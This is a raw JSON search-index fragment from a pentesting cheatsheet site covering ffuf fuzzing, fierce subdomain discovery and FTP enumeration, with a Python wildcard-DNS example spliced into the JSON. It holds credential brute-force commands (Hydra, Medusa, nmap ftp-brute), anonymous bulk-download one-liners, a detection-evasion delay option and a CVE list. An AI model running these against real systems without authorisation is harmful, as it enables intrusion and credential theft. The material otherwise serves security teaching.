data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to file (markdown)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.md -of md\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save as JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save all formats\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results -of all\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directories\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual hosts / subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Parameters\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Passwords\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-runs\"\u003eExample Full Runs\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directory + extension scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://example.com/FUZZ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -e .php,.html,.txt,.bak \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ac -c -v \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -o ffuf_dir.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual host discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ac -c \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -o ffuf_vhost.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"ffuf"},{"content":"fierce Cheatsheet Type: User-friendly recursive subdomain discovery with wildcard detection\nInstallation sudo apt install fierce # or pip3 install fierce # or git clone https://github.com/mschwager/fierce.git Basic Usage fierce --domain \u0026lt;domain\u0026gt; fierce --domain example.com Common Flags Flag Description --domain \u0026lt;domain\u0026gt; Target domain --wordlist \u0026lt;file\u0026gt; Custom wordlist for brute forcing --dns-servers \u0026lt;ns\u0026gt; Use specific DNS servers (space-separated) --delay \u0026lt;seconds\u0026gt; Delay between requests --subdomains \u0026lt;list\u0026gt; Manually specify subdomains to check --wide Scan entire Class C of discovered hosts --traverse \u0026lt;n\u0026gt; Scan IPs n away from discovered hosts --search \u0026lt;domains\u0026gt; Filter results by domain pattern --range \u0026lt;cidr\u0026gt; Scan an IP range for PTR records --connect Attempt HTTP/HTTPS connections to found hosts --output \u0026lt;file\u0026gt; Save results to JSON file Common 
Commands # Basic scan (uses built-in wordlist) fierce --domain example.com # Custom wordlist fierce --domain example.com \\ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Use specific DNS server fierce --domain example.com --dns-servers 8.8.8.8 # Wide scan (scan Class C of discovered IPs) fierce --domain example.com --wide # Add delay to evade detection fierce --domain example.com --delay 3 # Traverse IPs near discovered hosts fierce --domain example.com --traverse 5 # Check HTTP/HTTPS on found hosts fierce --domain example.com --connect # Save to JSON fierce --domain example.com --output results.json # Scan IP range for reverse DNS fierce --range 192.168.1.0/24 Key Features - Wildcard detection (avoids false positives from wildcard DNS) - Recursive: checks subdomains of subdomains - Identifies adjacent IPs in same IP space - Clean, readable output format - Built-in default wordlist Wildcard Detection Fierce automatically detects wildcard DNS entries. If a domain resolves all queries (e.g., *.example.com → same IP), fierce identifies this and handles it gracefully instead of reporting false positives.\nRecommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt /usr/share/wordlists/dnsmap.txt Example Full Run fierce --domain example.com \\ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ --dns-servers 8.8.8.8 \\ --connect \\ --output fierce_results.json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/fierce/","summary":"\u003ch1 id=\"fierce-cheatsheet\"\u003efierce Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e User-friendly recursive subdomain discovery with wildcard detection\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre 
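The wildcard check and the nearby-IP expansion (`--traverse`, `--wide`) described above are the two things that separate fierce from a plain wordlist loop. The block below is an added example for this cheatsheet, not fierce's own code: it implements both around a pluggable `resolve` callable (an assumption standing in for a real resolver such as `dns.resolver`), with a constructed zone and resolver so it runs offline. It also shows the failure mode the wildcard check cannot fix: a real host that shares the wildcard's IP is suppressed along with the noise.

```python
"""Wildcard-aware subdomain brute force with nearby-IP expansion, the two
checks fierce performs around its wordlist loop.

Added example for this cheatsheet, not fierce's own code. resolve is a
callable taking a name and returning its set of A records; the fake zone and
resolver below are constructed so the example runs offline, and a real run
would pass a function built on dns.resolver instead.
"""
import ipaddress
import random
import string

# Constructed zone: *.example.com is a wildcard answering 203.0.113.10, and
# four real hosts have records of their own.
WILDCARD_ANSWER = {"203.0.113.10"}
FAKE_ZONE = {
    "www.example.com": {"203.0.113.10"},                   # same IP as the wildcard
    "mail.example.com": {"203.0.113.25"},
    "vpn.example.com": {"198.51.100.7"},
    "dev.example.com": {"203.0.113.10", "203.0.113.11"},   # overlaps, but not equal
}


def fake_resolve(name):
    """A records for name, emulating a zone with a wildcard record."""
    if name in FAKE_ZONE:
        return set(FAKE_ZONE[name])
    if name.endswith(".example.com"):
        return set(WILDCARD_ANSWER)
    return set()


def random_label(length=12):
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def detect_wildcard(domain, resolve, probes=3):
    """Resolve a few random labels nobody would register. If they all return
    the same non-empty answer, that answer is the wildcard; otherwise empty."""
    answers = [frozenset(resolve(f"{random_label()}.{domain}")) for _ in range(probes)]
    if answers[0] and all(a == answers[0] for a in answers):
        return set(answers[0])
    return set()


def brute_force(domain, candidates, resolve):
    """Return (wildcard, found, suppressed).

    found maps confirmed names to sorted IPs; suppressed lists names whose
    answer equals the wildcard answer, which DNS alone cannot distinguish from
    a non-existent name. A real host parked on the wildcard IP is lost here:
    confirm those over HTTP, as --connect does."""
    wildcard = detect_wildcard(domain, resolve)
    found, suppressed = {}, []
    for label in candidates:
        name = f"{label}.{domain}"
        ips = resolve(name)
        if not ips:
            continue
        if wildcard and ips == wildcard:
            suppressed.append(name)
            continue
        found[name] = sorted(ips)
    return wildcard, found, suppressed


def nearby_ips(ip, n):
    """IPv4 addresses within n of ip, clipped to its /24: the --traverse
    expansion (fierce then reverse-looks-up each one)."""
    net = ipaddress.ip_network(f"{ip}/24", strict=False)
    lo, hi = int(net.network_address), int(net.broadcast_address)
    base = int(ipaddress.ip_address(ip))
    return [str(ipaddress.ip_address(v))
            for v in range(base - n, base + n + 1)
            if v != base and lo <= v <= hi]


if __name__ == "__main__":
    wc, found, dropped = brute_force("example.com", ["www", "mail", "ftp", "vpn", "dev"], fake_resolve)
    print("wildcard:", sorted(wc))
    for name, ips in found.items():
        print(f"{name:<20} {', '.join(ips)}   nearby: {nearby_ips(ips[0], 1)}")
    print("suppressed (match wildcard):", dropped)
```

`www.example.com` ends up in the suppressed list even though it is a real host, because its answer is exactly the wildcard answer; `dev.example.com` survives only because its record set differs. That is the trade-off behind fierce's wildcard handling, and the reason to pair DNS brute forcing with an HTTP check.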
tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install fierce\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install fierce\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/mschwager/fierce.git\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--domain 
\u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wordlist \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom wordlist for brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dns-servers \u0026lt;ns\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse specific DNS servers (space-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--delay \u0026lt;seconds\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--subdomains \u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eManually specify subdomains to check\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wide\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan entire Class C of discovered hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--traverse \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan IPs n away from discovered hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--search \u0026lt;domains\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter results by domain pattern\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--range \u0026lt;cidr\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan an IP range for PTR 
records\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--connect\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAttempt HTTP/HTTPS connections to found hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--output \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave results to JSON file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic scan (uses built-in wordlist)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom wordlist\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific DNS 
server\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --dns-servers 8.8.8.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Wide scan (scan Class C of discovered IPs)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --wide\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Add delay to evade detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --delay \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Traverse IPs near discovered hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --traverse \u003cspan style=\"color:#ae81ff\"\u003e5\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check HTTP/HTTPS on found hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --connect\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --output results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan IP range for reverse DNS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --range 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-features\"\u003eKey Features\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e- Wildcard detection (avoids false positives from wildcard DNS)\n- Recursive: checks subdomains of subdomains\n- Identifies adjacent IPs in same IP space\n- Clean, readable output format\n- Built-in default wordlist\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"wildcard-detection\"\u003eWildcard Detection\u003c/h2\u003e\n\u003cp\u003eFierce automatically detects wildcard DNS entries. 
If a domain resolves all queries (e.g., \u003ccode\u003e*.example.com\u003c/code\u003e → same IP), fierce identifies this and handles it gracefully instead of reporting false positives.\u003c/p\u003e","title":"fierce"},{"content":"FTP Enumeration Cheatsheet Default Ports: 21 (control), 20 (data - active mode)\nBanner Grabbing \u0026amp; Connection nc -nv \u0026lt;ip\u0026gt; 21 telnet \u0026lt;ip\u0026gt; 21 ftp \u0026lt;ip\u0026gt; openssl s_client -connect \u0026lt;ip\u0026gt;:21 -starttls ftp # FTPS Anonymous Login ftp \u0026lt;ip\u0026gt; # Username: anonymous # Password: anonymous (or leave blank) # Via curl curl -v ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous curl -v ftp://\u0026lt;ip\u0026gt;/\u0026lt;path\u0026gt;/ --user anonymous:anonymous FTP Commands (Once Connected) USER \u0026lt;username\u0026gt; # Send username PASS \u0026lt;password\u0026gt; # Send password SYST # Display system type STAT # Status / verbose file listing LIST # List files (verbose) NLST # Name list (simple) PWD # Print working directory CWD \u0026lt;dir\u0026gt; # Change directory GET \u0026lt;file\u0026gt; # Download file PUT \u0026lt;file\u0026gt; # Upload file MGET * # Download all files BINARY # Switch to binary transfer mode ASCII # Switch to ASCII transfer mode PASV # Enter passive mode QUIT # Disconnect Nmap FTP Scripts nmap -p 21 --script ftp-anon \u0026lt;ip\u0026gt; # Check anonymous login nmap -p 21 --script ftp-banner \u0026lt;ip\u0026gt; # Banner grab nmap -p 21 --script ftp-brute \u0026lt;ip\u0026gt; # Brute force credentials nmap -p 21 --script ftp-bounce \u0026lt;ip\u0026gt; # FTP bounce attack check nmap -p 21 --script ftp-syst \u0026lt;ip\u0026gt; # SYST command response nmap -p 21 --script ftp-vsftpd-backdoor \u0026lt;ip\u0026gt; # vsFTPd 2.3.4 backdoor check nmap -p 21 -sV --script ftp-* \u0026lt;ip\u0026gt; # Run all FTP scripts Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt ftp://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt 
ftp://\u0026lt;ip\u0026gt; medusa -u \u0026lt;user\u0026gt; -P wordlist.txt -h \u0026lt;ip\u0026gt; -M ftp Bulk Download # wget recursive download (no passive mode) wget -m --no-passive ftp://anonymous:anonymous@\u0026lt;ip\u0026gt; # curl recursive curl -s ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous | awk \u0026#39;{print $NF}\u0026#39; | \\ while read f; do curl -s ftp://\u0026lt;ip\u0026gt;/$f --user anonymous:anonymous -O; done Key Vulnerabilities Software CVE Description vsFTPd 2.3.4 CVE-2011-2523 Backdoor shell on port 6200 ProFTPd 1.3.5 CVE-2015-3306 mod_copy unauthenticated file copy ProFTPd 1.3.3c CVE-2010-4221 Remote heap overflow ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ftp/","summary":"\u003ch1 id=\"ftp-enumeration-cheatsheet\"\u003eFTP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 21 (control), 20 (data - active mode)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing--connection\"\u003eBanner Grabbing \u0026amp; Connection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etelnet \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eftp \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:21 -starttls ftp    \u003cspan style=\"color:#75715e\"\u003e# 
FTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"anonymous-login\"\u003eAnonymous Login\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eftp \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Username: anonymous\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password: anonymous  (or leave blank)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via curl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v ftp://\u0026lt;ip\u0026gt;/ --user 